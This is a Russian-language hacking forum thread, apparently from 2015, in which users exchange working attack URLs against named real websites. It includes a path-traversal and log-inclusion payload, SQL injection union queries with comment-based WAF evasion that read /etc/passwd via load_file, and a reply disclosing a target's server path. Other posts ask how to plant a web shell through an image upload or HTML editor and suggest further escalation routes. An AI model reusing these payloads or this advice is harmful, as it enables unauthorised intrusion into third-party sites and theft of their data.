 |
|

04.06.2015, 11:06
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от huntercs16
↑
Код:
http://esn.po.opole.pl/index2.php?dir=photo&id=../../../../../../../../../../../../../../../../../../../../../../var/log/apache2/error_log/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.&name=img_0160.jpg&site=photo_zoom
Вот тут реально нестандартный еррор лог. Что это?
это нестандартный еррор_лог. пробовали файлы сессии? лог ssh авторизации? сделать акк на сайте? найти ацес лог? есть ли возможность использовать врапперы? вообще в случае, когда на хосте крутится еще пара десятков сайтов стоит смотреть в их сторону
.SpoilerTarget" type="button">Spoiler: xek

|
|
|

04.06.2015, 13:25
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
.SpoilerTarget" type="button">Spoiler
http://beadfxnew.dmt.net/classes/cl...1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
Помогите waf обойти
|
|
|

04.06.2015, 21:19
|
|
Участник форума
Регистрация: 10.05.2015
Сообщений: 142
С нами:
5795606
Репутация:
57
|
|
Всем привет. Банальный вопрос:Если есть регистрация на сайте то значит сайт как то пишет регистрационные данные в базу.Но уязвимость sql в другом скрипте,например в index.php в параметре id.Так вот когда раскручиваешь скуль то оказывается что у current_user-а права только USAGE и подменить хэш админа он не может.Как так???? Получается что сайт записует данные от привелегирированого юзера??
|
|
|

04.06.2015, 21:30
|
|
Участник форума
Регистрация: 07.10.2013
Сообщений: 140
С нами:
6630806
Репутация:
6
|
|
Код:
http://filmfactor.pl/?st=-1+/*!uNIoN*/+%28/*!SelEcT*/+1,1,load_file('etc/passwd'),1,1,1,1,1,1,1+%29+--+;
Подскажите директорию в которой сайт лежит
|
|
|

04.06.2015, 21:37
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от huntercs16
↑
Код:
http://filmfactor.pl/?st=-1+/*!uNIoN*/+%28/*!SelEcT*/+1,1,load_file('etc/passwd'),1,1,1,1,1,1,1+%29+--+;
Подскажите директорию в которой сайт лежит
При вызове обычной sql ошибки, дается раскрытие путей:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/filmfactor/public_html/filmfactor/index.php on line 103
|
|
|

05.06.2015, 15:54
|
|
Участник форума
Регистрация: 10.05.2015
Сообщений: 251
С нами:
5795606
Репутация:
31
|
|
Никто не подскажет, как можно залить шелл через самописный двигл, имеется спортанский набор: Загрузка файл JPG, PNG,GIF, и обычный HTML редактор. Пробовал пропихнуть шелл через картинку, ничего не получилось, картинка обрабатывается какой то php функцией, и не дает загружать любое другое расширение кроме выше описанных (Корректировка запроса не помогает, все равно срабатывает защита). Так же пробовал в гифку добовлять комментарий - результата 0. Так же в запросе я нашел местечко, куда сгружаются все заблокированные файлы, попробовал подставить, дало ошибку 403)) Так же заметил одну особенность, файлы загружается через SQL запрос. Может быть есть способы заливки шелла именно через HTML редактор, ведь туда что угодно впихнуть можно?
|
|
|

05.06.2015, 18:05
|
|
Участник форума
Регистрация: 14.07.2012
Сообщений: 115
С нами:
7278806
Репутация:
26
|
|
Ребя, нужен аналог плагина Live HTTP Headers, ибо он перестал работать ( на кнопку "Повтор" не регагирует). Нужно чтобы была возможноть POST переменные передавать строкой типа &a1=1&a2=2&a3=3, а не по отдельности забивать как в программе HttpReq например.
|
|
|

05.06.2015, 18:55
|
|
Участник форума
Регистрация: 10.05.2015
Сообщений: 251
С нами:
5795606
Репутация:
31
|
|
Сообщение от Ravenous
↑
Ребя, нужен аналог плагина Live HTTP Headers, ибо он перестал работать ( на кнопку "Повтор" не регагирует). Нужно чтобы была возможноть POST переменные передавать строкой типа &a1=1&a2=2&a3=3, а не по отдельности забивать как в программе HttpReq например.
Burp Suite.
|
|
|

05.06.2015, 19:22
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от Ravenous
↑
Ребя, нужен аналог плагина Live HTTP Headers, ибо он перестал работать ( на кнопку "Повтор" не регагирует). Нужно чтобы была возможноть POST переменные передавать строкой типа &a1=1&a2=2&a3=3, а не по отдельности забивать как в программе HttpReq например.
HackBar
|
|
|

05.06.2015, 20:45
|
|
Участник форума
Регистрация: 13.01.2013
Сообщений: 157
С нами:
7015286
Репутация:
2
|
|
Сообщение от Ravenous
↑
Ребя, нужен аналог плагина Live HTTP Headers, ибо он перестал работать ( на кнопку "Повтор" не регагирует). Нужно чтобы была возможноть POST переменные передавать строкой типа &a1=1&a2=2&a3=3, а не по отдельности забивать как в программе HttpReq например.
http://rghost.ru/8XjjrkDrr исправленный плагин
+
/threads/422049/
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|